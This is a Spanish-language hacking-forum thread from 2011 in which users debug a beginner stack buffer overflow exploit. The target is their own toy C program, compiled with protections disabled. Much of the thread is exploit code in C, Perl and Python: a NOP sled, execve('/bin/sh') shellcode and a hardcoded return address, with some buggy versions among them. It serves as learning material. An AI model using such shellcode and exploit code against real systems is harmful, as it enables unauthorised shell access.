elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Ético
| | |-+  Bugs y Exploits
| | | |-+  [First BoF Linux attack : Sagrini 2010 : elhacker.net] [Funciona!!!]
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: [First BoF Linux attack : Sagrini 2010 : elhacker.net] [Funciona!!!]  (Leído 10,706 veces)
Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
[First BoF Linux attack : Sagrini 2010 : elhacker.net] [Funciona!!!]
« en: 22 Enero 2011, 17:50 pm »

Bueno, ahi va el titulo, la cosa es que tengo un programita con una vulnerabilidad y lo estoy explotando. El otro dia consegui manejar el transcurso de la aplicacion, y ahora abrir una shellcode...
Lo hago asi:
Código:
./vuln [23 NOPS + 25 Shellcode + 4 RET]
La idea la saque de un post antiguo del foro... Evidentemente se puede cambiar la posicion de los Nops, pero bueno...

Bueno, consigo la shellcode al correrlo asi:
Código:
./vuln $(perl -e 'print "\x90"x23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"."\x18\x1f\x9b\xbf"')
$
Pero a la hora de hacer el exploit...
Código:
juanra@Juanra:~/Escritorio/Shell$ gcc -o exploit exploit.c
juanra@Juanra:~/Escritorio/Shell$ ./exploit
Fallo de segmentación
juanra@Juanra:~/Escritorio/Shell$ gdb -q exploit
(gdb) r
Starting program: /home/juanra/Escritorio/Shell/exploit

Program received signal SIGSEGV, Segmentation fault.
0xb77521f4 in strcpy () from /lib/tls/i686/cmov/libc.so.6
(gdb)

Tengo este codigo, en el que también va como comentario el vulnerable...
Código
  1. /*
  2. First BoF Linux attack : Sagrini 2010 : elhacker.net
  3. 23 Nops + 25 Shellcode + 4 Ret = 52 [48 Buffer + Ret] + 7 ["./vuln "] = 59
  4.  
  5. gcc -o vuln vuln.c --no-stack-protector -g -z execstack
  6. ./vuln $(perl -e 'print "\x90"x23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"."\x18\x1f\x9b\xbf"')
  7. $
  8.  
  9. gcc -o exploit exploit.c
  10. ./exploit
  11. $
  12.  
  13. ------------------------------------------
  14. !!! Vuln code !!!
  15. #include <stdio.h>
  16. #include <stdlib.h>
  17. #include <string.h>
  18.  
  19. void soy_vuln(char *arg)
  20. {
  21. char buffer [48];
  22. strcpy (buffer, arg);
  23. }
  24.  
  25. int main(int argc, char *argv[])
  26. {
  27. if (argc != 2) return 1;
  28. soy_vuln(argv[1]);
  29. }
  30. ------------------------------------------
  31. */
  32.  
  33. #include <stdio.h>
  34. #include <string.h>
  35.  
  36. int main ()
  37. {
  38. printf ("First BoF Linux attack : Sagrini 2010 : elhacker.net");
  39.  
  40. char nops [23];
  41. memset (nops, '\x90', 23);
  42. char shellcode [25] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
  43. char ret [4] = "\x18\x1f\x9b\xbf";
  44.  
  45. char command [59];
  46. strcpy (command, "./vuln ");
  47. strcpy (command, nops);
  48. strcpy (command, shellcode);
  49. strcpy (command, ret);
  50. execve (command, command, NULL);
  51.  
  52. return 0;
  53. }
  54.  
  55.  

Ahora mi pregunta es... ¿Qué falla?
« Última modificación: 9 Febrero 2011, 19:07 pm por Sagrini » En línea



* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.544


🏴 Libertad!!!!!


Ver Perfil WWW
Re: [First BoF Linux attack : Sagrini 2010 : elhacker.net] ¿No funciona?
« Respuesta #1 en: 23 Enero 2011, 14:32 pm »

lo que falla es que tienes protecciones anti stack over flow

saludos
En línea

Donaciones
1ABSD1rMTmNZHJrJP8AJhDNG1XbQjWcRz7
Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: [First BoF Linux attack : Sagrini 2010 : elhacker.net] ¿No funciona?
« Respuesta #2 en: 23 Enero 2011, 15:35 pm »

lo que falla es que tienes protecciones anti stack over flow

Los desactivo en el vuln, no en el exploit... Ahora mismo pruebo...
Modf: Anon, nada...

Código
  1. /*
  2. First BoF Linux attack : Sagrini 2010 : elhacker.net
  3. 23 Nops + 25 Shellcode + 4 Ret = 52 [48 Buffer + Ret] + 7 ["./vuln "] = 59
  4.  
  5. gcc -o vuln vuln.c --no-stack-protector -g -z execstack
  6. ./vuln $(perl -e 'print "\x90"x23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"."\x18\x1f\x9b\xbf"')
  7. $
  8.  
  9. gcc -o exploit exploit.c
  10. ./exploit
  11. $
  12.  
  13. ------------------------------------------
  14. !!! Vuln code !!!
  15. #include <stdio.h>
  16. #include <stdlib.h>
  17. #include <string.h>
  18.  
  19. void soy_vuln(char *arg)
  20. {
  21. char buffer [48];
  22. strcpy (buffer, arg);
  23. }
  24.  
  25. int main(int argc, char *argv[])
  26. {
  27. if (argc != 2) return 1;
  28. soy_vuln(argv[1]);
  29. }
  30. ------------------------------------------
  31. */
  32.  
  33. #include <stdio.h>
  34. #include <string.h>
  35.  
  36. int main ()
  37. {
  38. printf ("First BoF Linux attack : Sagrini 2010 : elhacker.net\n");
  39.  
  40. char nops [23];
  41. memset (nops, 'A', 23);
  42. char shellcode [25] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
  43.  
  44. char ret [4] = "\x18\x1f\x9b\xbf";
  45.  
  46. char command [59];
  47. strcpy (command, "./vuln ");
  48. strcat (command, nops);
  49. strcat (command, shellcode);
  50. strcat (command, ret);
  51. // system (command);
  52.  
  53. printf ("%s", command);
  54.  
  55. return 0;
  56. }
  57.  
Si os dais cuenta, no ejecuto nada, solo muestro la cadena. Antes de eso, al strcpy (command, shellcode) da el fallo...
Ahora me pasare por el foro C/C++ porque no es fallo de vuln...
Compilo asi...
Código:
juanra@Juanra:~/Escritorio/Shell$ gcc -o exploit exploit.c --no-stack-protector -z execstack
juanra@Juanra:~/Escritorio/Shell$ ./exploit
First BoF Linux attack : Sagrini 2010 : elhacker.net
Fallo de segmentación
juanra@Juanra:~/Escritorio/Shell$
Alguna idea?
« Última modificación: 23 Enero 2011, 17:49 pm por Sagrini » En línea



* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
Ivanchuk


Desconectado Desconectado

Mensajes: 469


LLVM


Ver Perfil WWW
Re: [First BoF Linux attack : Sagrini 2010 : elhacker.net] ¿No funciona?
« Respuesta #3 en: 23 Enero 2011, 22:00 pm »


Código
  1.  
  2. char shellcode [25] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
  3.  
  4.  
  5.  
  6. char ret [4] = "\x18\x1f\x9b\xbf";
  7.  
  8.  
  9.  
  10. char command [59];
  11.  
  12. strcpy (command, "./vuln ");
  13.  
  14. strcat (command, nops);
  15.  
  16. strcat (command, shellcode);
  17.  
  18. strcat (command, ret);
  19.  
  20.  





Cuando usas c chars con las funciones strxxx, los cadenas tienen que contener \x0 para marcar el fin de la misma sino strxxx va a seguir de largo y copiar cualquier cosa. Si queres serguir usando esas funciones agregales '\0' al final de las cadenas que usas sino podes usar memcpy.

Mirate el man execve. El 2do argumento es un arreglo de punteros a char, el mismo tipo que argv.

Probate este code:
Código:
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
 
int main ()
{
printf ("First BoF Linux attack : Sagrini 2010 : elhacker.net\n");
 
char nops [24];
memset (nops, '\x90', 23);
nops[23] = '\0';
char shellcode [] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x0";
char ret [] = "\x18\x1f\x9b\xbf\x0";
 
char command [59];
strcpy (command, nops);
strcat (command, shellcode);
strcat (command, ret);
char *cmd[] = {command, NULL};
execve ("./vuln", cmd, NULL);
 
return 0;
}
En línea

Sólo quien practica lo absurdo puede lograr lo imposible.

Join us @ http://foro.h-sec.org
Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: [First BoF Linux attack : Sagrini 2010 : elhacker.net] ¿No funciona?
« Respuesta #4 en: 24 Enero 2011, 19:12 pm »

Bueno, de acuerdo, ahora no da fallo de segm. pero no ejecuta nada...
Código:
juanra@Juanra:~/Escritorio/Shell$ gcc -o exploit exploit.c -z execstack --no-stack-protector
juanra@Juanra:~/Escritorio/Shell$ ./exploit
First BoF Linux attack : Sagrini 2010 : elhacker.net
juanra@Juanra:~/Escritorio/Shell$

Vale, ahora qué, si fuese porque cambia la dirección de memoria me diriía fallo de segmentación, pero nada...
Una cosa, si le meto un byte nulo, no se rellena todo... No va... Voy a probar otra cosa...
--------------------------------------------------------------------------------------------------------------------------------------------------------
Modf: Pruebo con este code:
Código
  1. #include <stdlib.h>
  2. #include <string.h>
  3. #include <stdio.h>
  4.  
  5. int main ()
  6. {
  7. printf ("First BoF Linux attack : Sagrini 2010 : elhacker.net\n");
  8.  
  9. char command [] = "./vuln \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x18\x1f\x9b\xbf";
  10.  
  11. system (command);
  12. return 0;
  13. }
  14.  
y este
Código
  1. #include <stdlib.h>
  2. #include <string.h>
  3. #include <stdio.h>
  4.  
  5. int main ()
  6. {
  7. printf ("First BoF Linux attack : Sagrini 2010 : elhacker.net\n");
  8.  
  9. char command [] = "./vuln \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x18\x1f\x9b\xbf";
  10.  
  11. char *cmd[] = {command, NULL};
  12. execve ("./vuln", cmd, NULL);
  13. return 0;
  14. }
  15.  

En el primero, "Segmentation Fault". En el segundo no printea nada menos la primera frase.
¿Qué hago?
« Última modificación: 24 Enero 2011, 19:40 pm por Sagrini » En línea



* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
Ivanchuk


Desconectado Desconectado

Mensajes: 469


LLVM


Ver Perfil WWW
Re: [First BoF Linux attack : Sagrini 2010 : elhacker.net] ¿No funciona?
« Respuesta #5 en: 24 Enero 2011, 20:22 pm »

Me parece que te dije cualquier verdura hehe, perdona. En realidad los char * inicializados con dobles comillas, c les agrega un null byte al final automaticamente. El problema lo tenias con los nops, porq los llenabas con memset.

Bueno retomando, en el segundo codigo, porq metes "./vuln" al principio del argumento para vuln en execve???

En el primero ni idea...
« Última modificación: 24 Enero 2011, 20:28 pm por Ivanchuk » En línea

Sólo quien practica lo absurdo puede lograr lo imposible.

Join us @ http://foro.h-sec.org
Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: [First BoF Linux attack : Sagrini 2010 : elhacker.net] ¿No funciona?
« Respuesta #6 en: 25 Enero 2011, 18:38 pm »

./vuln es el programa a ejecutar no? Voy a contar los nops, a ver si he metido de más...
execve (<nombre prog>, <argumentos completos> <entorno>);
Pues eso...

Ahora modf, que se me ha ocurrido otra cosa...
En línea



* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
mr.blood

Desconectado Desconectado

Mensajes: 150


Ver Perfil
Re: [First BoF Linux attack : Sagrini 2010 : elhacker.net] ¿No funciona?
« Respuesta #7 en: 6 Febrero 2011, 12:55 pm »

Yo no he tenido ningun problema en hacer el exploit ni en C, ni en Python ;).

C:
Código
  1. #include <stdio.h>
  2. #include <string.h>
  3. #include <stdlib.h>
  4.  
  5. int main()
  6. {
  7. char name[]="./bof";
  8. char nops[24]="";
  9. memset(nops, '\x90', 23); /* Copiamos el byte 90 23 veces en la variable nops */
  10. char shellcode[]="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
  11. char ret[]="\x18\x1f\x9b\xbf";
  12.  
  13. char *cmd;/* Definimos un puntero donde juntaremos todo, para llamarlo con system */
  14. cmd=(char *)malloc(strlen(name)+strlen(nops)+strlen(shellcode)+strlen(ret)+1);/* Reservamos la memoria necesaria
  15. para juntar todo */
  16. sprintf(cmd, "%s %s%s%s", name,nops,shellcode,ret);/* Juntamos name, nop, shellcode y ret en el
  17. puntero cmd, entre name y los demas campos dejamos un espacio */
  18. system(cmd);
  19. free(cmd);/* Liberamos la memoria */
  20. return 0;
  21. }
  22.  



Python:
Código
  1. import os
  2. archivo="./bof "
  3. nops="\x90" * 23
  4. shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
  5. ret="\x18\x1f\x9b\xbf"
  6.  
  7. os.system(archivo+nops+shellcode+ret)
  8.  

Espero haberte ayudado, porque no se si llegaste a resolver tu duda ;).

Sa1uDoS
« Última modificación: 7 Febrero 2011, 16:12 pm por mr.blood » En línea

Belial & Grimoire


Desconectado Desconectado

Mensajes: 559


Tea_Madhatter


Ver Perfil
Re: [First BoF Linux attack : Sagrini 2010 : elhacker.net] ¿No funciona?
« Respuesta #8 en: 7 Febrero 2011, 00:59 am »

pues yo tambien lo intente y no me funciono, ya trate de modificar los nops, no se si sea igual en linux, pero en windows tenia que dejar ret exacto en EIP para que saltara y se creara la shell

pues lo intente y no me funciona... sera por alguna razon de sistemas linux, yo utilizo debian suqeeze

Código
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4.  
  5. int main(){
  6.  
  7. char exp[] = "./vuln";
  8. char nops[23] = "";
  9. memset(nops, '\x90', 23);
  10. char shellcode[]="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
  11. char ret[]="\x18\x1f\x9b\xbf";
  12.  
  13. char *cmd;
  14. cmd=(char *)malloc(strlen(exp) + strlen(nops) + strlen(shellcode) + strlen(ret) + 1);
  15.  
  16. sprintf(cmd,"%s %s %s %s", exp, nops, shellcode, ret);
  17.  
  18. system(cmd);
  19. free(cmd);
  20.  
  21. return 0;
  22. }

Código
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4.  
  5. void soy_vuln(char *arg){
  6.  
  7. char buff[48];
  8. strcpy(buff, arg);
  9. printf("%s", buff);
  10. }
  11.  
  12. int main(int argc, char *argv[]){
  13.  
  14. if(argc != 2) return 1;
  15.  
  16. soy_vuln(argv[1]);
  17. }
En línea

.                                 
mr.blood

Desconectado Desconectado

Mensajes: 150


Ver Perfil
Re: [First BoF Linux attack : Sagrini 2010 : elhacker.net] ¿No funciona?
« Respuesta #9 en: 7 Febrero 2011, 06:57 am »

Porque dejas esto asi ???

Código:
sprintf(cmd,"%s %s %s %s", exp, nops, shellcode, ret);

Tiene que ser
Código:
sprintf(cmd,"%s %s%s%s", exp, nops, shellcode, ret);

Sino es normal que no te funcione ;).

Si lo copias tal y como esta (mi codigo) no te funciona ???

Has compilado vuln como
Código:
gcc -o vuln vuln.c --no-stack-protector -g -z execstack
???

Sa1uDoS
En línea

Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Tutorial] Introducion a los sockets en Ansi C : By Sagrini 2010
Programación C/C++
Garfield07 8 5,638 Último mensaje 19 Enero 2011, 19:50 pm
por Garfield07
[Texto] Atacando ASLR : By Sagrini 2012
Bugs y Exploits
Sagrini 1 1,932 Último mensaje 10 Marzo 2012, 02:09 am
por farresito
ayuda . textos de sagrini
Bugs y Exploits
afdlkglfgfdgfhgf 2 4,026 Último mensaje 10 Julio 2012, 00:49 am
por cirano045
elhacker linux « 1 2 »
GNU/Linux
samyforse3 15 4,716 Último mensaje 7 Marzo 2014, 13:20 pm
por Edusoner
Mass mailer attack, Kali Linux
GNU/Linux
acpesp666 2 1,148 Último mensaje 26 Agosto 2017, 01:48 am
por acpesp666
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines